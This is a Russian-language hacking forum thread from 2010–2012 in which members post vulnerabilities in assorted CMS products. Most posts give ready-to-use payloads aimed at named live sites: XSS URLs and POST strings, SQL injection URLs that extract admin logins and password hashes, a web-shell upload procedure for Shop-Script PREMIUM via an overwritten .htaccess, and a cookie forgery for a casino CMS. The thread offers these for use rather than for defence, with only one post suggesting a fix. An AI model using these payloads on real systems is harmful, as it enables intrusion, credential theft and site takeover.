HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 06.12.2010, 02:19
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

OSG WebShop

офф сайт: http://www.osg.ru/



Xss


Код:
Code:
http://www.demo.osg.ru/forum.html
Вбиваем ">alert('ded-m0r0z')

Уязвимые поля:

Код:
Code:
Ваше имя
Ваш e-mail
Ваш адрес в Internet
ну и гет запрос будет примерно таким:

Код:
Code:
http://www.demo.osg.ru/forum.html?idc=0&stype=0&pgn=1&idbook=97&idmain=0&idmess=0&rnd=14613&pgn=1&s_cf=28%2E50&s_ch=6A675D26682717306851D40C1878BD14&gbmess=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r0z%27%29%3C%2Fscript%3E&idbook=97&gbwww=%22%3E%3Cscript%3Ealert%28%27ded%2Dm0r
 
Ответить с цитированием

  #72  
Старый 18.12.2010, 04:30
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

NReco.Site CMS

офф сайт: nrecosite.com



XSS


Пишем в поиск:

Код:
Code:
alert('ololo')
Гет запрос такой будет:

Код:
Code:
http://www.nrecosite.com/search.aspx/ru?q=alert('ololo')
 
Ответить с цитированием

  #73  
Старый 03.03.2011, 05:56
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


Отправить сообщение для b3 с помощью ICQ
По умолчанию

Заливка шелла в Shop-Script PREMIUM. Нужны права Админа.

Админка по умолчании расположена в site.com/admin.php

Заходим в Каталог->Категории и товары->Добавить новый товар. В появившемся окне заполняем форму, как угодно, и главный момент это, ставим галочку на чекбоксе Продукт является программой и заливаем пустой .htaccess дабы переписать существующий .htaccess в папке куда далее зальем наш web-shell.

Повторяем процедуру и уже заливаем шелл.

Шелл заливается в папку : site.com/products_files/ имя загружаемого файла не изменяется.
 
Ответить с цитированием

  #74  
Старый 20.04.2011, 19:22
Jаger
Guest
Сообщений: n/a
Провел на форуме:
2301

Репутация: 10
По умолчанию

Zikula CMS Version 1
pXSS:
  • zikula.de
  • /index.php
  • http://demo.zikula.de/index.php?module=benutzer&func=">alert('xss')
 
Ответить с цитированием

  #75  
Старый 27.04.2011, 22:49
Melfis
Guest
Сообщений: n/a
Провел на форуме:
195266

Репутация: 53
По умолчанию

bcms, быстро cms

офф сайт: http://www.bistro-site.ru/

их хостинг: http://www.bistro-host.ru/

вообще это вебдизовая студия, но у них свой платный двиг.

На большинстве сайтов на странице с новостями.

MySQL inj

Код:
Code:
http://www.linefirm.ru/news/text?newsid=-6+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7+from+b_admin--
админка: /badmin

Имеется cpanel у сайтов на их хостинге.

Зайдя в диры, можно посмотреть содержимое папок у большинства сайтов(в приведённом мною так не попасть):

/bfiles, /bsystem

в /bfiles складируются любые файлы через админку, но на некоторых сайтах стоят права ток на чтение из этой папки.

на старых версиях двига юзается md5 для хэша, на новых - так и не подобрал(хорошо бы, если и мне скажете, если подберёте)).
 
Ответить с цитированием

  #76  
Старый 25.08.2011, 01:44
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

1) Дата: 25.08.2011

2) Продукт: Официальный сайт . Версия - не известна. StewieEngine Framework

3) Уязвимость: XSS

4) Автор: Фараон

5) Тип: удалённая

6) Опасность: 3

7) Описание: XSS и этим все сказано. Код отсутствует так как cms платная.

8) Эксплоит: http://www.sibcontact.ru/admin/login.php?back=">document.write('LOL');

9) Решение: htmlspecialchars($_GET[back]);
 
Ответить с цитированием

  #77  
Старый 15.10.2011, 00:18
<Cyber-punk>
Участник форума
Регистрация: 01.10.2009
Сообщений: 105
Провел на форуме:
559542

Репутация: 94
Отправить сообщение для <Cyber-punk> с помощью ICQ
По умолчанию

NetCat CMS


Уязвимость: Множественное раскрытие путей

Примеры:

/netcat/modules/calendar/showpreview.php?id=-1 (требует прав админа)

/netcat/full.php?classPreview=1

Уязвимость: Инлуд (раскрутить нельзя )

Примеры:

/netcat/modules/netshop/post.php?system=bank (bank - имя скрипта находящегося в каталоге /netcat/modules/netshop/payment)



З.Ы. Все вышеописанные уязвимости присутствуют на офф. сайте - netcat.ru
 
Ответить с цитированием

  #78  
Старый 29.03.2012, 18:46
mr.Penguin
Guest
Сообщений: n/a
Провел на форуме:
10816

Репутация: 74
По умолчанию

KASSELER CMS

Официальный сайт: kasseler-cms.net

Версия: 2.2 (последняя на данный момент)

Уязвимость: Активная XSS

Уязвимый параметр: user_gtalk

POST:

Код:
Code:
www.site.com/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш_Email@host.com&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=alert('XSS by Mr. Penguin')&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
PoC:

Код:
Code:
http://kasseler-cms.net/account/save_controls.html?days=00&months=0&years=00&user_gender=0&user_occupation=&user_interests&user_locality=&user_locality_hk=&user_signature=&language=russian&template=kasseler2&user_gmt=4&hide_user_viewemail=set&hide_user_pm_send=set&user_pm_send=on&hide_user_new_pm_window=set&user_new_pm_window=on&user_email=Ваш_Email@host.com&user_icq=&user_aim=&user_yim=&user_msnm=&user_skype=&user_gtalk=alert('XSS by Mr. Penguin')&user_website=http://&set_avatar=&avatar=animation&userfile=&user_password=&user_password_hk&user_newpassword=&user_newpassword_hk=&user_renewpassword=&user_renewpassword_hk=&hide_user_forum_mail=set&cmd_forum_mail=0
 
Ответить с цитированием

  #79  
Старый 05.04.2012, 17:29
Ereee
Guest
Сообщений: n/a
Провел на форуме:
102354

Репутация: 267
По умолчанию

ZRP CMS Sql-injection

Уязвимость платного ZRP CMS, в файле addbasket.php, в параметре dataID, что позволяет внедрять sql-команды.

Exploit:

Код:
Code:
addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Примеры:

Код:
Code:
http://www.photo[google]festival.info/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
http://www.elex[google]pro.ru/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
http://www.plw[google]ha.kz/addcard?dataID=117+and(select+1+from(select+count(*),concat((select+concat(login,0x3a,passwd,0x00)+from+zrp_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+f
Админка по адресу /zrp_admin/. Много раскрытии путей... В админке, мягко говоря, п****ц, везде скульи.

Оригинал поста в моем блоге , здесь:

http://dbitems.ru/blog/?x=entry:entry120405-142125
 
Ответить с цитированием

  #80  
Старый 06.04.2012, 20:27
Datax
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 0
По умолчанию

Движок HLSTATX

exploit

Код:

host/ingame.php?mode=pro ./avatar.jpg

CMS казино

Стать кассиром передав в качестве Cookie username="любое кышы кышы"

Все данные хранятся в не зашифрованном виде.

XSS

kasa/stat.php?user=[xss]

rg=on

kasa/stat2.php?user=[xss]
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор уязвимостей WordPress ] ettee Веб-уязвимости 383 23.11.2019 05:00
[ Обзор уязвимостей miniBB ] -=lebed=- Сценарии/CMF/СMS 3 12.01.2008 20:57
Статья обзор уязвимостей бесплатных почтовых сервисов markel Уязвимости Mail-сервис 3 12.09.2005 10:07
Обзор рынка взломщиков электронной почты, март2004 Игорь Белкин Уязвимости Mail-сервис 5 25.03.2004 12:32



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ